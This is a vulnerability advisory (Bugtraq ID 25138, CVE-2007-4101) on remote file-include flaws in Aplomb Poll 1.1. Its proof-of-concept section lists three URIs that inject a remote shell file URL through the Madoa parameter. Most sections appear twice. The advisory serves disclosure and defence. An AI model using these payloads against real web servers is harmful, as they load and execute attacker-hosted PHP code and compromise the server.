Aplomb Poll Madoa Parameter Multiple Remote File Include Vulnerabilities
BID:25138
Info
Aplomb Poll Madoa Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 25138 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4101 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2007 12:00AM |
| Updated: | May 07 2015 05:36PM |
| Credit: | ilker kandemir is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Global Centre Aplomb Poll 1.1 |
| Not Vulnerable: | |
Discussion
Aplomb Poll Madoa Parameter Multiple Remote File Include Vulnerabilities
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Aplomb Poll 1.1 is vulnerable; other versions may also be affected.
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Aplomb Poll 1.1 is vulnerable; other versions may also be affected.
Exploit / POC
Aplomb Poll Madoa Parameter Multiple Remote File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?Madoa=http://sheel.txt?
http://www.example.com/vote.php?Madoa=http://sheel.txt?
http://www.example.com/admin.php?Madoa=http://shell.txt?
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?Madoa=http://sheel.txt?
http://www.example.com/vote.php?Madoa=http://sheel.txt?
http://www.example.com/admin.php?Madoa=http://shell.txt?
Solution / Fix
Aplomb Poll Madoa Parameter Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Aplomb Poll Madoa Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- Aplomb Poll Home Page (Global Centre )